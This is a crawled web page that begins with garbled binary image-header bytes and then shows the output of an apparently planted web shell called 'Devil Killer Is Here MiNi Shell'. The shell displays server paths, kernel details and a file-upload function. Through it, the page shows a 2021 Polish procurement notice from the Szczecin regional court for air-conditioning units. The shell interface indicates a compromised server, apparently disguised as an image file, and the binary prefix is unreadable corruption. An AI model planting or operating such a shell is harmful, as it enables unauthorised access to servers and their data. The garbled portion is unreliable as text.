JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210921/0018771601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA JEDNOSTEK KLIMATYZACYJNYCH <br/>DO SĄDU OKRĘGOWEGO W SZCZECINIE UL. KASZUBSKA 42 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000324530</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kaszubska 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-227</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mariusz.odorski@szczecin.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://szczecin.so.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Sąd Okregowy w Szczecinie </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA JEDNOSTEK KLIMATYZACYJNYCH <br/>DO SĄDU OKRĘGOWEGO W SZCZECINIE UL. KASZUBSKA 42 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-693ab82b-1ac8-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00187716</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00017170/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 DOSTAWA JEDNOSTEK KLIMATYZACYJNYCH DO SĄDU OKRĘGOWEGO W SZCZECINIE UL. KASZUBSKA 42</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dopełnego i prawidłowego korzystania z Systemu przez<br/>UżytkownikówZewnętrznychkoniecznejestposiadanie przez co najmniej jednego<br/>uprawnionegoUżytkownikaZewnętrznegoWykonawcykwalifikowanego podpisu elektronicznego lub<br/>podpisuzaufanego lubpodpisu osobistegosłużącego doautentykacji i podpisu.Korzystanie z Systemu<br/>możliwejest podwarunkiem spełnieniaprzez sprzęt, zktórego korzystają użytkownicy<br/>Wykonawcynastępującychminimalnych wymagańtechnicznych ispecyfiki połączenia:- posiadanie<br/>komputera oparametrachumożliwiającychzainstalowanienastępującego oprogramowania:1.1.w<br/>zakresiepodstawowychfunkcjonalności –przegląd, pobieranie izałączanie dokumentów: a)<br/>przeglądarkainternetowa MozillaFirefox ver. 65 ipóźniejsze, GoogleChrome ver. 66 i późniejsze lub<br/>Opera w ver. 58i późniejsze,Microsoft Edge ver 18i późniejsze,Internet Explorer 11,b) Lista zalecanych<br/>przeglądarekinternetowych:Google Chrome,MozillaFirefox,Opera. Zalecane jest używanie<br/>najnowszych wersjiprzeglądarekc)systemoperacyjnyWindows 10 i późniejsze1.2.w zakresie składania<br/>podpisukwalifikowanego: a)zainstalowaneśrodowisko Java w wersji min. 1.8 (jre)b) w przypadku<br/>przeglądarekOpera, ChromeiFirefox należydoinstalować dodatek do przeglądarki Szafir SDK Web<br/>c)oprogramowania SzafirHostwsystemieoperacyjnym.Instrukcja instalowania<br/>oprogramowaniawskazanego w punktach a, b icpowyżejznajduje się w Systemie w zakładce Elearning.<br/>Wymaganiatechniczne iorganizacyjnewysyłania iodbierania dokumentów elektronicznych i<br/>informacjiprzekazywanych przy ichużyciu zostałyopisane wRegulaminie korzystania z usług<br/>Systemu(Regulamin Portalu e-Usług)dostępnym zpoziomu modułuE-learning dla wszystkich<br/>użytkownikówSystemu oraz podczas rejestracjikontaWykonawcy dlaWykonawców.Użycie przez<br/>Wykonawcę dokontaktu z Zamawiającymśrodkówkomunikacjielektronicznej zapewnionych w Systemie<br/>jestuzależnione od uprzedniej akceptacjiprzezWykonawcęRegulaminu korzystania z usług Systemu<br/>nawitrynie internetowej przy zakładaniuprofiluWykonawcy. Korzystanie z Systemu przez Wykonawcówjest bezpłatne. UżytkownikomZewnętrznymWykonawcyprzysługuje prawo korzystania z<br/>asystyobejmującej wsparcie techniczne w kwestiachdotyczącychkorzystania z Systemu, polegające na<br/>doradztwie telefonicznym i e-mailowymnazasadachokreślonych w Regulaminie korzystania z<br/>usługSystemu. W sytuacji awariiSystemulubniedostępności Systemu, uniemożliwiających<br/>komunikacjęWykonawcy i ZamawiającegopoprzezSystem, Zamawiający dopuszcza komunikację za<br/>pomocą pocztyelektronicznejnaadres:mariusz.odorski@szczecin.so.gov.pl (nie dotyczy<br/>składaniaofert).Maksymalnyrozmiarpojedynczychplików przesyłanych za pośrednictwem Systemu<br/>wynosi 100MB. ZapośrednictwemSystemu możnaprzesłać wiele pojedynczych plików lub plik<br/>skompresowanydoarchiwum (ZIP)zawierający wielepojedynczych plików.Dopuszczalne formaty<br/>przesyłanych danychtj.plików owielkości do 100 MB wformatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls,<br/>.xlsx, .ppt, .pptx,.odt,.ods,.odp, .odf, .pdf, .zip, .rar,.7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml,<br/>.msgZadatęprzekazania iodbioru danych, wszczególności oferty, wniosków,<br/>zawiadomień,dokumentówelektronicznych,oświadczeń oraz innychinformacji przyjmuje się datę<br/>zapisania pliku naserwerzeSystemu. Aktualnadata i godzina,zsynchronizowane z Głównym Urzędem<br/>Miar, wyświetlanesą wprawym górnymroguSystemu.Informacje na temat kodowania i czasu<br/>przekazania iodbiorudanych:1.Oferta złożonaprzezWykonawcę w Systemie, nie jest widoczna<br/>dlaZamawiającego,ponieważ widnieje w Systemiejakozaszyfrowana. Możliwość otwarcia oferty<br/>dostępnajest dopiero poodszyfrowaniuprzez Zamawiającego po upływie terminu składania ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/><br/>1.	Administratorem Państwa danych osobowych jest Sąd Okręgowy w Szczecinie, 70 - 952 Szczecin, ul. Kaszubska 42, fax nr 91 48 55 555.<br/>2.	Inspektorem ochrony danych jest Pani Jadwiga Smutek-e-mail:jsmutek@szczecin.so.gov.pl, tel: 91 48 38 463.<br/>3.	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia postepowania o udzielenie zamówienia publicznego na podstawie Pzp. Odbiorcami Państwa danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa. <br/>4.	Państwa dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną i przepisami prawa (Pzp).<br/>5.	Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z Pzp. <br/>6.	W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>7. Posiadają Państwo: <br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących; <br/>2) na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych * ; <br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; 4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Państwu: <br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/><br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. <br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/5/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawę jednostek klimatyzacyjnych do Sądu Okręgowego w Szczecinie ul. Kaszubska 42:<br/>- jednostka wewnętrzna VRF typ naścienny nr 1-11 szt.<br/>- jednostka wewnętrzna VRF typ naścienny nr 2-9 szt.<br/>- jednostka wewnętrzna VRF typ naścienny nr 3-10 szt.<br/>- jednostka wewnętrzna VRF typ naścienny nr 4-7 szt.<br/>- jednostka wewnętrzna VRF typ naścienny nr 5-9 szt.<br/>- jednostka wewnętrzna VRF typ naścienny nr 6-2 szt.<br/>- jednostka wewnętrzna VRF typ naścienny/podstropowa nr 7-2 szt.<br/>Klimatyzacyjne jednostki zewnętrzne.<br/>-jednostka zewnętrzna VRF typ stojący nr 5-1szt.<br/>-jednostka zewnętrzna VRF typ stojący nr 4-1 szt.<br/>-jednostki zewnętrznej typ stojący nr 2 i 3-2 szt.<br/>-jednostki zewnętrznej typ stojący nr 1-1 szt.<br/>- centralny sterownik z wyświetlaczem ciekłokrystalicznym, z funkcja obsługi sterowania nie miej niż 35 urządzeń, z możliwością podłączenia do sieci LAN poprzez przeglądarkę internetową-1 kpl.<br/>Pilot bezprzewodowy – 50 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42500000-1 - Urządzenia chłodzące i wentylacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/>1) Cena oferty brutto (C) – 60 %<br/>1.1. W zakresie powyższego kryterium oferta może uzyskać maks. 60 pkt.<br/>1.2. Ocena punktowa kryterium „cena” dokonana zostanie zgodnie z formułą:<br/>zamawiający przyporządkuje najkorzystniejszej wartości (najniższa cena) maksymalną ilość punktów zgodnie z przyjętą skalą punktową, tj. 60. Każdej następnej wartości zamawiający przyporządkuje ilość punktów proporcjonalnie mniejszą stosując wzór:<br/> <br/> najniższa cena ofertowa brutto<br/>C= ----------------------------------------- x100 x 60%<br/> cena oferty badanej brutto<br/><br/>2) Wysokość kary umownej (KU)-40 % <br/>1.1. W zakresie powyższego kryterium oferta może uzyskać maks. 40 pkt.<br/>1.2. Ocena punktowa kryterium „kara umowna” dokonana w następujący sposób:<br/><br/>Wykonawca zobowiązany jest wskazać proponowaną wysokość kary umownej, która będzie miała zastosowanie w przypadku określonym w § 12, ust 1, pkt 1) złącznika nr 3 do SWZ - wzór umowy (odpowiednio dla każdej części).<br/>Wysokość kary umownej należy podać w procentach w zaokrągleniu do jednego miejsca po przecinku; jeżeli wykonawca poda kary umowne w inny sposób, podane wartości zostaną zaokrąglone do jednego miejsca po przecinku).<br/>Dopuszczalna wartość kary umownej jaką może podać w ofercie wykonawca to: min. 0,1% - max. 1% <br/>W przypadku podania przez Wykonawcę, w ofercie kary umownej poniżej określonego przez zamawiającego minimum, zamawiający przyjmie, że wykonawca oferuje karę umowną o wartości minimalnej dopuszczonej przez zamawiającego, jeśli zaś wykonawca wskaże w ofercie karę umowną powyżej wskazanego limitu, zamawiający przyjmie, że wykonawca oferuje karę umowną o wartości maksymalnej dopuszczonej przez zamawiającego w danym przypadku.<br/><br/>Zamawiający przyzna punkty w omawianym kryterium poprzez zastosowanie następujących zasad:<br/>- jeżeli wartość kary umownej wskazanej przez wykonawcę wynosi do 0,1 % przyznane zostanie 0 pkt <br/>- jeżeli wartość kary umownej wskazanej przez wykonawcę powyżej 0,1% do 0,3% przyznane zostanie 12 pkt <br/>- jeżeli wartość kary umownej wskazanej przez wykonawcę powyżej 0,3 % do 0,5% przyznane zostanie 20 pkt <br/>- jeżeli wartość kary umownej wskazanej przez wykonawcę powyżej 0,5 % do 0,7% przyznane zostanie 28 pkt <br/>- jeżeli wartość kary umownej wskazanej przez wykonawcę powyżej 0,7 % do 0,9 % przyznane zostanie 36 pkt <br/>- jeżeli wartość kary umownej wskazanej przez wykonawcę powyżej 0,9% do max 1,00 % przyznane zostanie 40 pkt <br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów zgodnie ze wzorem: Lp = C+KU</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kara umowna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia, że oferowane dostawy spełniają określone przez Zamawiającego wymagania, cechy Zamawiający wymaga złożenia wraz z ofertą przez Wykonawcę karty produktu wg. wzoru stanowiącego załącznik nr 5 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> karty produktu wg. wzoru stanowiącego załącznik nr 5 do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składając ofertę zobowiązany jest złożyć:<br/>Wypełniony formularz ofertowy, według wzoru stanowiącego Załącznik nr 1 do SWZ;Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania <br/>o udzielenie za¬mówienia - wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy <br/>z Wykonawców (wspólnicy spółki cywilnej traktowani są jako Wykonawcy składający ofertę wspólną). <br/>W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej - pełnomocnictwo lub inny dokument (np. akt powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w systemie common law, członka rady dyrektorów spółki, a także umowa spółki cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki) potwierdzający umocowanie do reprezentowania Wykonawcy;Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wspólnicy spółki cywilnej traktowani są jako Wykonawcy składający ofertę wspólną); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o<br/>udzieleniezamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania<br/>ich wpostępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy<br/>(liderkonsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim<br/>profiluWykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych<br/>Wykonawcówwpisując ich dane.Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie<br/>zZamawiającym w toku postępowania i do niego Zamawiający kieruje<br/>informacje,korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za<br/>wiążące dlawszystkich Wykonawców składających ofertę wspólną. Nie dopuszcza się<br/>uczestniczeniaktóregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie<br/>zamówienia w więcej niżjednej grupie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców<br/>wspólnieubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w<br/>ramachgrupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.Wspólnicy<br/>spółkicywilnej są traktowani jak Wykonawcy składający ofertę wspólną.Szczegóły 